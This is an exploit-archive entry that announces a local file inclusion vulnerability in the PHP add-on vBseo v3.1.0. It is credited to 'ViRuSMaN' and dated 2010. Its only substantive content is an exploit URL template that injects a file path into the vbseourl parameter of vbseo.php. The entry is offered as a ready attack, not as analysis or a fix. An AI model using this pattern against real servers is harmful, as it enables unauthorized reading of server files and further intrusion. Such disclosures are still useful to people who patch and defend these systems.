id: 11014
date: 02/22/2010
title: vBeso v3.1.0 Local File Include Vulnerability
author: ViRuSMaN
cves: 

=============================================
vBeso v3.1.0 Local File Include Vulnerability
=============================================

======================================================================
 
========
        [»] vBseo v3.1.0 Local File Include Vulnerability
======================================================================
 
========
 
    [»] Script:             [ vBseo ]
    [»] Language:           [ PHP ]
    [»] Founder:            [ ViRuSMaN ]
 
###########################################################################
 
===[ Exploit ]===
 
    [»] http://server/[path]/vbseo.php?vbseoembedd=1&vbseourl=[LFI]
 
 
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-26]  #